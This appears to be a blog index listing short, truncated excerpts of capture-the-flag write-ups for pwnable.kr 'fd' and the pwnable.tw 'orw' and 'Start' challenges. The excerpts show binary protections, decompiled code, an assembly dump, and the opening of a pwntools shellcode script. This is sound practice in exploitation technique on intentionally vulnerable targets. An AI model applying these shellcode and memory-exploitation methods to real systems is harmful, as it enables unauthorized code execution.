Pwnable.kr

Toddler’s Bottle fd
This game's write-up is written after I passed it. And this game is very easy.
Connect to the server with the user and password.
ls -l
Check whether there is something under the folder. I found these:
cat fd.c
Check the source code. The program verifies that the command line argument count is at least two. If not, the program prints a hint. Next, the program converts argv[1] from ASCII to a number and subtracts 0x1234 from that number....

March 20, 2023 · b1n

Pwnable.tw Orw

Challenge hint: Read the flag from /home/orw/flag. Only open read write syscall are allowed to use.
checksec:
[*] '/home/kkkk/code/orw'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
    RWX:      Has RWX segments
Look at the pseudocode:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  orw_seccomp();
  printf("Give my your shellcode:");
  read(0, &shellcode, 0xC8u);
  ((void (*)(void))shellcode)();
  return 0;
}
It reads 0xc8 bytes, then casts them to a function pointer and executes them. This challenge only needs an open/read/write shellcode. pwntools can generate it automatically:
from pwn import *
context(os="linux", arch="i386", log_level="debug")
r = remote("chall....

December 25, 2022 · b1n

Pwnable.tw Start

checksec:
[*] '/home/kkkk/code/start'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x8048000)
disassem:
Dump of assembler code for function _start:
=> 0x08048060 <+0>:  push   esp
   0x08048061 <+1>:  push   0x804809d
   0x08048066 <+6>:  xor    eax,eax
   0x08048068 <+8>:  xor    ebx,ebx
   0x0804806a <+10>: xor    ecx,ecx
   0x0804806c <+12>: xor    edx,edx
   0x0804806e <+14>: push   0x3a465443
   0x08048073 <+19>: push   0x20656874
   0x08048078 <+24>: push   0x20747261
   0x0804807d <+29>: push   0x74732073
   0x08048082 <+34>: push   0x2774654c
   0x08048087 <+39>: mov    ecx,esp
   0x08048089 <+41>: mov    dl,0x14
   0x0804808b <+43>: mov    bl,0x1
   0x0804808d <+45>: mov    al,0x4
   0x0804808f <+47>: int    0x80
   0x08048091 <+49>: xor    ebx,ebx
   0x08048093 <+51>: mov    dl,0x3c
   0x08048095 <+53>: mov    al,0x3
   0x08048097 <+55>: int    0x80
   0x08048099 <+57>: add    esp,0x14
   0x0804809c <+60>: ret
End of assembler dump....

December 24, 2022 · b1n